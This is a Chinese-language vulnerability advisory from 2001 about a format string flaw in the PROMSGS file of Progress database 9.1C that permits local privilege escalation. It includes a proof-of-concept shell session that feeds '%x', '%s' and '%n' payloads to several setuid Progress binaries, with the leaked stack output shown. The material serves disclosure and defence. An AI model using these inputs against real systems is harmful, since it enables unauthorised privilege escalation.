Progres 数据库中的PROMSGS 存在格式字符串漏洞发布时间:2001-11-03 更新时间:2001-11-03 严重程度:高 威胁程度:本地管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 PROGRESS Version 9.1C详细描述 Progress中的PROMSGS存在格式字符串漏洞,可以导致破坏堆栈,覆盖返回地址, 获得权限提升。 测试代码 [elguapo@linux bin]$ echo blah > file [elguapo@linux bin]$ export PROMSGS=./file [elguapo@linux bin]$ ./_probuild errno=0 reading promsgs file, it may have been deleted. Unable to format message number 290 errno=0 reading promsgs file, it may have been deleted. Unable to format message number 96 errno=0 reading promsgs file, it may have been deleted. Unable to format message number 6063 errno=0 reading promsgs file, it may have been deleted. Unable to format message number 24 errno=0 reading promsgs file, it may have been deleted. Unable to format message number 912 Test to make sure they fixed my original hole with the buffer overflows. (looks fine) [elguapo@linux bin]$ echo `perl -e 'print "A" x 20000'` > file [elguapo@linux bin]$ ./_probuild Error formatting messaage 96. Message file is corrupt. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA errno=0 reading promsgs file, it may have been deleted. Unable to format message number 6063 Error formatting messaage 24. Message file is corrupt. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA errno=0 reading promsgs file, it may have been deleted. Unable to format message number 912 Well if you use a format string instead of an A we get much better results. [elguapo@linux bin]$ echo `perl -e 'print "%x" x 9000'` > file [elguapo@linux bin]$ ./_probuild Error formatting messaage 96. Message file is corrupt. 0x00x00x3e0x83c63500xbffff81c0x10x00x8062d350x3cc6140x00xbffffd4f0x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7340x80618450x00x83e3ec00x83e3ec00x83c7b200x900x83c63500xbffff81c0x10xbffff66c0x00x401e5f2c0x10000x401e44a00xbffff6680x4013f2bd0x10000x401e5f2c0xbffff7180x4013f2aa% errno=0 reading promsgs file, it may have been deleted. Unable to format message number 6063 Error formatting messaage 24. Message file is corrupt. 0x837a70e0x83c63500x83e970c0x00xbffff6240x807784b0x40x83e95b00x83c63500xbffff81c0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x5148004d0xbffff5440x83e3ec00xbffff6c40x83166430xbffff5440xbffff6040xc00xbffff5440x83e3ec00xbffff5440x83e3ec00x83c63500x00x83e3ec00x50x2000x8a0xbffff5ad0x920xbffff56d% errno=0 reading promsgs file, it may have been deleted. Unable to format message number 912 [elguapo@linux bin]$ echo `perl -e 'print "%s" x 9000'` > file [elguapo@linux bin]$ ./_probuild Error formatting messaage 96. Message file is corrupt. Error formatting messaage 49. Message file is corrupt. Error formatting messaage 49. Message file is corrupt. Error formatting messaage 49. Message file is corrupt. Error formatting messaage 49. Message file is corrupt. Error formatting messaage 49. Message file is corrupt. Error formatting messaage 49. Message file is corrupt. Error formatting messaage 49. Message file is corrupt. Error formatting messaage 49. Message file is corrupt. Error formatting messaage 49. Message file is corrupt. Error formatting messaage 49. Message file is corrupt. rcurctr overflow reading promsgs file. (note the overflow msg) [elguapo@linux bin]$ echo `perl -e 'print "%n" x 9000'` > file [elguapo@linux bin]$ ./_probuild Error formatting messaage 96. Message file is corrupt. 0(tty)0(tty)6225424-20201(tty)0(tty)11573-148280(tty)-68928197281972819728197281972819728197-2011-225262130(tty)16064160643152014425424-20201(tty)-24520(tty)24364409617568-2456-3395409624364-2280-3414% errno=0 reading promsgs file, it may have been deleted. Unable to format message number 6063 Error formatting messaage 24. Message file is corrupt. -2277025424-268680(tty)-2524307954-2721625424-20200(tty)82240(tty)128578246822421057139041978977-274816064-236426179-2748-2556192-274816064-274816064254240(tty)160645512138-2643146-2707% errno=0 reading promsgs file, it may have been deleted. Unable to format message number 912 I am sure you get the idea... ALL suids in the dlc/bin dir are affected [elguapo@linux bin]$ ./_dbutil Error formatting messaage 96. Message file is corrupt. 0x00x00x3e0x81159280xbffff77c0x00x00x805ec350x11cdf40x00xbffffd530x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff7250xbffff72c0x80543750x00x81222a00x81222a00x81161c00x900x81159280xbffff77c0x00x00x40015b980x7c304040x40012b4b0xbffff7000x40015a400x804bb1b0x00x10x400c4a4c0x400227c8% errno=0 reading promsgs file, it may have been deleted. Unable to format message number 6063 Error formatting messaage 24. Message file is corrupt. 0x80fd96e0x81159280x81271340x00xbffff61c0x806540b0x40x8126fd80x81159280xbffff77c0x00x804daea0x00x81222a00x10x81159280x2080xbffff7480xdff00000x00x00x00x616441740x532f0x00x00xbffff7800x00x4e2069720x2020766f0x333120320x3a33313a0x322031310xa3130300x8000ff000x80b00d0c0x3900ffb00x2043312e0x202020200x20202020% errno=0 reading promsgs file, it may have been deleted. Unable to format message number 912 [elguapo@linux bin]$ ./_mprosrv 14:03:13 Error formatting messaage 96. Message file is corrupt. 14:03:13 0x00x00x3e0x812f6280xbffff82c0x10x00x3f0xfff5e40x00xbffffd510x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7200x80582250x00x813e8c00x813e8c00x81300200x900x812f6280xbffff82c0x10x400003d40x400157e00x80x40022c140x80x400c816c0x10x00x400229240xc0b8fae0x400227b8% 14:03:13 errno=0 reading promsgs file, it may have been deleted. 14:03:13 Unable to format message number 940 [elguapo@linux bin]$ ./_mprshut Error formatting messaage 96. Message file is corrupt. 0x00x00x3e0x81802500xbffff82c0x10x00x805af750x1858740x00xbffffd510x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff6a00x80587650x00x819b8c00x819b8c00x8180d800x900x81802500xbffff82c0x10x00x00x00x00x00x00x00x00x00x00x0% errno=0 reading promsgs file, it may have been deleted. Unable to format message number 940 [elguapo@linux bin]$ ./_proapsv 14:03:33 02 Nov 2001 Error formatting messaage 96. Message file is corrupt. 14:03:33 02 Nov 2001 0x00x00x3e0x842f7f00xbffff8300xbffff82c0x00x80645050x435d140x00xbffffd510x78 2578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff825 0xbffff4180x80630150x00x84573200x84573200x84312200x900x842f7f00x00xbffff82c0 x40015a400x400154140x40015a400x805527a0xbffff3680x4000d3600x40015b940x40022c 900x70x00x180% [elguapo@linux bin]$ ./_progres Error formatting messaage 96. Message file is corrupt. 0x00x00x3e0x840eaf00xbffff82c0x10x00x80646750x414ff40x00xbffffd510x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7440x80631850x00x842d1200x842d1200x84105000x900x840eaf00xbffff82c0x10xbffff67c0x00x401e5f2c0x10000x401e44a00xbffff6780x4013f2bd0x10000x401e5f2c0xbffff7280x4013f2aa% errno=0 reading promsgs file, it may have been deleted. Unable to format message number 6063 Error formatting messaage 24. Message file is corrupt. 0x83bc8ce0x840eaf00x843296c0x00xbffff6340x807b0fb0x40x84328100x840eaf00xbffff82c0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x5148004d0xbffff5540x842d1200xbffff6d40x83587c30xbffff5540xbffff6140xc00xbffff5540x842d1200xbffff5540x842d1200x840eaf00x00x842d1200x50x2000x8a0xbffff5bd0x920xbffff57d% errno=0 reading promsgs file, it may have been deleted. Unable to format message number 912 [elguapo@linux bin]$ ./_proutil \Error formatting messaage 96. Message file is corrupt. 0x00x00x3e0x81ae9480xbffff82c0x10x00x80595d50x1b3f340x00xbffffd510x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7200x80580e50x00x81d77200x81d77200x81af4400x900x81ae9480xbffff82c0x10x40015b940x6dcac560x40012b4b0xbffff6f00x40015a400x804cdee0x400c5a4c0x400227c80x400c255c0x400227c80x0% errno=0 reading promsgs file, it may have been deleted. Unable to format message number 6063 Error formatting messaage 24. Message file is corrupt. 0x817912e0x81ae9480x81dc5b40x00xbffff6100x806ea1b0x40x81dc4580x81ae9480xbffff82c0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x5148004d0xbffff5300x81d77200xbffff6b00x816cdd30xbffff5300xbffff5f00xc00xbffff5300x81d77200xbffff5300x81d77200x81ae9480x00x81d77200x50x2000x8a0xbffff5990x920xbffff559% errno=0 reading promsgs file, it may have been deleted. Unable to format message number 912 [elguapo@linux bin]$ ./_rfutil Error formatting messaage 96. Message file is corrupt. 0x00x00x3e0x812d0080xbffff82c0x10x00x80586b50x1324740x00xbffffd530x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff71c0x80571c50x00x81433e00x81433e00x812d9800x900x812d0080xbffff82c0x10x40015b940x6dcac560x40012b4b0xbffff6ec0x40015a400x804c3a70x400c5a4c0x400227c80x400c255c0x400227c80xbffff67c% errno=0 reading promsgs file, it may have been deleted. Unable to format message number 940 [elguapo@linux bin]$ ./prolib Error formatting messaage 96. Message file is corrupt. 0x00x00x3e0x806c4480x806e4ac0xbffff5fc0x00x00x00x00xbffffd550x782578250x782578250x782578250x782578250x782578250x782578250x782578250x7250xbffff3cc0x804b5590x00x806c4480x806e4ac0x7970x00x806e4ac0x00x00x00x00x00x00x00x00x00x00x00x00x0%errno=0 reading promsgs file, it may have been deleted. Unable to format message number 1943 解决方案 尚无 相关信息 KF (dotslash@snosoft.com) 参考:http://archives.neohapsis.com/archives/bugtraq/2001-11/0011.html |
